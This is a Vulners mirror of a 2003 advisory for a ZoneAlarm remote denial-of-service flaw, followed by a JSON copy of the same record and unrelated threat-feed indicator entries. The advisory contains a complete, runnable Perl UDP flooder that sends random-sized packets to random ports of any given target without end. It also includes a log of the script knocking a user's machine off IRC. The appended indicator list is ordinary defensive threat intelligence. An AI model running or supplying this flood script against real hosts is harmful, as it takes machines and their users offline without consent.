Search...

ZoneAlarm remote Denial Of Service exploit

2003-09-03T00:00:00

ID SECURITYVULNS:DOC:5044
Type securityvulns
Reporter Securityvulns
Modified 2003-09-03T00:00:00

Description

Overview :

ZoneAlarm is a firewall software

package designed for Microsoft Windows

operating systems that blocks intrusion

attempts, trusted by millions, and has

advanced privacy features like worms,

Trojan horses, and spyware protection.

ZoneAlarm is distributed and maintained

by Zone Labs.http://www.zonelabs.com

Details :

ZoneAlarm was found vulnerable to a

serious vulnerability leading to a

remote Denial Of Service condition due

to failure to handle udp random

packets, if an attacker sends multiple

udp packets to multiple ports 0-65000,

the machine will hang up until the

attacker stop flooding.

The following is a remote test done

under ZoneAlarm version 3.7.202 running

on windows xp home edition.

on irc test1 joined running ZoneAlarm

version 3.7.202 with default

installation

* test1 (test@62.251.*.) has joined #Hackology

from a linux box :

[root@mail DoS]# ping 62.251.*.

PING 62.251..* (62.251..*) from

... : 56(84) bytes of data.

--- 62.251.*. ping statistics ---

7 packets transmitted, 0 received, 100%

loss, time 6017ms

on irc

-> [test1] PING

[test1 PING reply]: 1secs

Host is firewalled and up

now lets try to dos

--- ZoneAlarm Remote DoS Xploit

---

--- Discovered & Coded By _6mO_HaCk

[] DoSing 62.251.. ... wait 1

minute and then CTRL+C to stop

[root@mail DoS]

after 2 minutes

* test1 (test@62.251.*.) Quit (Ping timeout)

I have made the same test on ZoneAlarm

Pro 4.0 Release running on windows xp

professional and i've got the same

result.

Exploit released : 02/09/03

Vulnerable Versions : ALL

Operating Systems : ALL Windows

Successfully Tested on :

ZoneAlarm version 3.7.202 / windows xp

home edition / windows 98.

ZoneAlarm Pro 4.0 Release / windows xp

professional

Vendor status : UNKOWN

Solution : Shut down ZoneAlarm and wait

for an update.

The following is a simple code written

in perl to demonstrate that, the code

is clean, it wont eat your cpu usage

and it doesnt need to be run as root

but you still have to use it at your

own risk and on your own machine or

remotly after you get permission.

Big thanx go to D|NOOO and frost for

providing me windows boxes with

zonealarm for testing

Greetz to ir7ioli, BlooDMASK

Abderrahman@zone-h.org

NRGY, Le_Ro| JT ghosted_ Securma,

anasoft SySiPh, phrack, DeV|L0Ty,

MajNouN |BiG-LuV| h4ckg1rl and all

my ppl here in Chicago and in Morocco

Comments suggestions or additional info

feel free to contact me at

simo@benyoussef.org

_6mO_HaCk@linuxmail.org

!/usr/bin/perl

use Socket;

system(clear); print "\n"; print "--- ZoneAlarm Remote DoS Xploit\n"; print "---\n"; print "--- Discovered & Coded By _6mO_HaCk\n"; print "\n"; if(!defined($ARGV[0])) { &usage }

my ($target); $target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve $target");

socket(DoS, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) { $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:5044", "bulletinFamily": "software", "title": "ZoneAlarm remote Denial Of Service exploit", "description": "\r\n\r\n# Overview : \r\n#\r\n# ZoneAlarm is a firewall software\r\n# package designed for Microsoft Windows \r\n# operating systems that blocks intrusion \r\n# attempts, trusted by millions, and has \r\n# advanced privacy features like worms, \r\n# Trojan horses, and spyware protection. \r\n# ZoneAlarm is distributed and maintained \r\n# by Zone Labs.http://www.zonelabs.com\r\n#\r\n# Details :\r\n#\r\n# ZoneAlarm was found vulnerable to a\r\n# serious vulnerability leading to a\r\n# remote Denial Of Service condition due \r\n# to failure to handle udp random \r\n# packets, if an attacker sends multiple \r\n# udp packets to multiple ports 0-65000, \r\n# the machine will hang up until the\r\n# attacker stop flooding. \r\n#\r\n# The following is a remote test done \r\n# under ZoneAlarm version 3.7.202 running \r\n# on windows xp home edition.\r\n#\r\n# on irc test1 joined running ZoneAlarm\r\n# version 3.7.202 with default\r\n# installation\r\n#\r\n# * test1 (test@62.251.***.**) has joined #Hackology\r\n#\r\n# from a linux box :\r\n#\r\n# [root@mail DoS]# ping 62.251.***.**\r\n# PING 62.251.***.** (62.251.***.**) from \r\n# ***.***.**.** : 56(84) bytes of data.\r\n#\r\n# --- 62.251.***.** ping statistics ---\r\n# 7 packets transmitted, 0 received, 100% \r\n# loss, time 6017ms\r\n#\r\n# on irc\r\n#\r\n# -> [test1] PING\r\n#\r\n# [test1 PING reply]: 1secs\r\n#\r\n# Host is firewalled and up\r\n#\r\n# now lets try to dos\r\n#\r\n# --- ZoneAlarm Remote DoS Xploit\r\n# ---\r\n# --- Discovered & Coded By _6mO_HaCk\r\n#\r\n# [*] DoSing 62.251.***.** ... wait 1\r\n# minute and then CTRL+C to stop\r\n#\r\n# [root@mail DoS]#\r\n#\r\n# after 2 minutes\r\n#\r\n# * test1 (test@62.251.***.**) Quit (Ping timeout)\r\n#\r\n# I have made the same test on ZoneAlarm \r\n# Pro 4.0 Release running on windows xp\r\n# professional and i've got the same \r\n# result.\r\n#\r\n# Exploit released : 02/09/03\r\n#\r\n# Vulnerable Versions : ALL\r\n#\r\n# Operating Systems : ALL Windows\r\n#\r\n# Successfully Tested on :\r\n#\r\n# ZoneAlarm version 3.7.202 / windows xp \r\n# home edition / windows 98.\r\n#\r\n# ZoneAlarm Pro 4.0 Release / windows xp \r\n# professional\r\n#\r\n# Vendor status : UNKOWN\r\n#\r\n# Solution : Shut down ZoneAlarm and wait \r\n# for an update.\r\n#\r\n# The following is a simple code written \r\n# in perl to demonstrate that, the code \r\n# is clean, it wont eat your cpu usage\r\n# and it doesnt need to be run as root \r\n# but you still have to use it at your\r\n# own risk and on your own machine or\r\n# remotly after you get permission.\r\n#\r\n# Big thanx go to D|NOOO and frost for \r\n# providing me windows boxes with\r\n# zonealarm for testing\r\n#\r\n# Greetz to ir7ioli, BlooDMASK\r\n# Abderrahman@zone-h.org\r\n# NRGY, Le_Ro| JT ghosted_ Securma,\r\n# anasoft SySiPh, phrack, DeV|L0Ty, \r\n# MajNouN |BiG-LuV| h4ckg1rl and all \r\n# my ppl here in Chicago and in Morocco\r\n#\r\n# Comments suggestions or additional info \r\n# feel free to contact me at\r\n# simo@benyoussef.org\r\n# _6mO_HaCk@linuxmail.org\r\n\r\n#!/usr/bin/perl\r\nuse Socket;\r\n\r\nsystem(clear);\r\nprint "\n";\r\nprint "--- ZoneAlarm Remote DoS Xploit\n";\r\nprint "---\n";\r\nprint "--- Discovered & Coded By _6mO_HaCk\n";\r\nprint "\n";\r\nif(!defined($ARGV[0]))\r\n{\r\n &usage\r\n}\r\n\r\nmy ($target);\r\n $target=$ARGV[0];\r\n\r\nmy $ia = inet_aton($target) || die ("[-] Unable to resolve \r\n$target");\r\n\r\nsocket(DoS, PF_INET, SOCK_DGRAM, 17);\r\n $iaddr = inet_aton("$target");\r\n\r\nprint "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";\r\n\r\nfor (;;) {\r\n $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x\r\n$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x\r\n$rand x $rand;\r\n $port=int(rand 65000) +1;\r\n send(DoS, 0, $size, sockaddr_in($port, $iaddr));\r\n}\r\nsub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}\r\n\r\n", "published": "2003-09-03T00:00:00", "modified": "2003-09-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5044", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-08-31T11:10:08", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310813663", "OPENVAS:1361412562311220201398", "OPENVAS:1361412562310813666", "OPENVAS:1361412562310813665", "OPENVAS:1361412562310813672", "OPENVAS:1361412562310813670"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1398.NASL", "ADOBE_ACROBAT_APSB18-21.NASL", "NEWSTART_CGSL_NS-SA-2019-0233_GCC.NASL"]}, {"type": "cve", "idList": ["CVE-2014-2595", "CVE-2015-9286", "CVE-2018-5044", "CVE-2008-7273", "CVE-2019-5044", "CVE-2008-7272"]}, {"type": "talos", "idList": ["TALOS-2019-0811"]}, {"type": "kitploit", "idList": ["KITPLOIT:8249941423348208298", "KITPLOIT:7666822453544838142"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:CDAE18779D798AF24649FFD6CD8A99D6"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:45477ECD0A0F60BA46719A3A87A0DB53"]}], "modified": "2018-08-31T11:10:08", "rev": 2}, "vulnersScore": 5.5}, "affectedSoftware": [], "immutableFields": []}

{"rst": [{"lastseen": "2021-04-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **harmarena[.]work** in [RST Threat Feed](https://rstcloud.net/profeed) with score **7**.\n First seen: 2020-10-22T03:00:00, Last seen: 2021-04-17T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 45[.]80.175.70\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-10-22T00:00:00", "id": "RST:18888CE9-5044-352A-BCD8-8E9D7DD4CDE6", "href": "", "published": "2021-04-18T00:00:00", "title": "RST Threat feed. IOC: harmarena.work", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-12T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **94[.]75.253.85** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-04-12T03:00:00.\n IOC tags: **generic**.\nASN 60781: (First IP 94.75.197.0, Last IP 94.75.255.255).\nASN Name \"LEASEWEBNLAMS01\" and Organisation \"Netherlands\".\nThis IP is a part of \"**leaseweb**\" address pools.\nASN hosts 576829 domains.\nGEO IP information: City \"\", Country \"Netherlands\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:2D40CEAA-5044-3F83-B3BA-CA08CB1CCEE5", "href": "", "published": "2021-04-14T00:00:00", "title": "RST Threat feed. IOC: 94.75.253.85", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-08T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **182[.]182.88.128** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-08T03:00:00.\n IOC tags: **generic**.\nASN 17557: (First IP 182.180.176.0, Last IP 182.183.255.255).\nASN Name \"PKTELECOMASPK\" and Organisation \"Pakistan Telecommunication Company Limited\".\nASN hosts 538 domains.\nGEO IP information: City \"Hyderabad\", Country \"Pakistan\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:B56D05C7-5044-37E2-944A-785633862622", "href": "", "published": "2021-04-08T00:00:00", "title": "RST Threat feed. IOC: 182.182.88.128", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-02T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **gruppqsex54[.]myq-see.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **20**.\n First seen: 2021-04-02T03:00:00, Last seen: 2021-04-02T03:00:00.\n IOC tags: **phishing**.\nWhois:\n Created: 2009-04-30 19:29:52, \n Registrar: unknown, \n Registrant: Network Solutions LLC.\nIOC could be a **False Positive** (Domain not resolved, but Whois records found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-02T00:00:00", "id": "RST:3705ABD8-5044-3546-827F-8B332B6EEE57", "href": "", "published": "2021-04-03T00:00:00", "title": "RST Threat feed. IOC: gruppqsex54.myq-see.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-31T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **https://bsdsv-trfgt-yhnbv[.]s3-eu-west-1.amazonaws.com/index.html** in [RST Threat Feed](https://rstcloud.net/profeed) with score **59**.\n First seen: 2021-03-31T03:00:00, Last seen: 2021-03-31T03:00:00.\n IOC tags: **phishing**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-31T00:00:00", "id": "RST:FA1C8A76-5044-34D6-BE78-1C36CCD8438B", "href": "", "published": "2021-04-01T00:00:00", "title": "RST Threat feed. IOC: https://bsdsv-trfgt-yhnbv.s3-eu-west-1.amazonaws.com/index.html", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **102[.]130.24.92** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **6**.\n First seen: 2020-06-16T03:00:00, Last seen: 2021-03-10T03:00:00.\n IOC tags: **botnet, generic**.\nWe found that the IOC is used by: **mirai**.\nASN 328388: (First IP 102.130.16.0, Last IP 102.130.31.255).\nASN Name \"AS328388\" and Organisation \"\".\nASN hosts 23 domains.\nGEO IP information: City \"Bethlehem\", Country \"South Africa\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-06-16T00:00:00", "id": "RST:58D8D09D-5044-368D-A2DC-59503A151950", "href": "", "published": "2021-03-24T00:00:00", "title": "RST Threat feed. IOC: 102.130.24.92", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **52[.]37.172.19** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **10**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 16509: (First IP 52.24.0.0, Last IP 52.43.255.255).\nASN Name \"AMAZON02\" and Organisation \"Amazoncom Inc\".\nThis IP is a part of \"**amazon_cloud_ec2**\" address pools.\nASN hosts 14742129 domains.\nGEO IP information: City \"\", Country \"United States\".\nIOC could be a **False Positive** (Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-05T00:00:00", "id": "RST:8D6DD10E-5044-3904-B320-293762C2475B", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 52.37.172.19", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **owa[.]minerpool.net** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-01-10T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-01-10T00:00:00", "id": "RST:D2DB86C5-5044-35CE-9121-15493E1F08BE", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: owa.minerpool.net", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **cthome[.]evolution-project.go.ro** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-08-04T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-08-04T00:00:00", "id": "RST:AB0553F8-5044-34E6-B7CF-5F76B3F2F46E", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: cthome.evolution-project.go.ro", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **daggerhashimoto-test[.]usa.api.nicehash.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **cryptomining**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-17T00:00:00", "id": "RST:8368F50D-5044-3C8B-B960-0E3FFED954D0", "href": "", "published": "2021-02-24T00:00:00", "title": "RST Threat feed. IOC: daggerhashimoto-test.usa.api.nicehash.com", "type": "rst", "cvss": {}}]}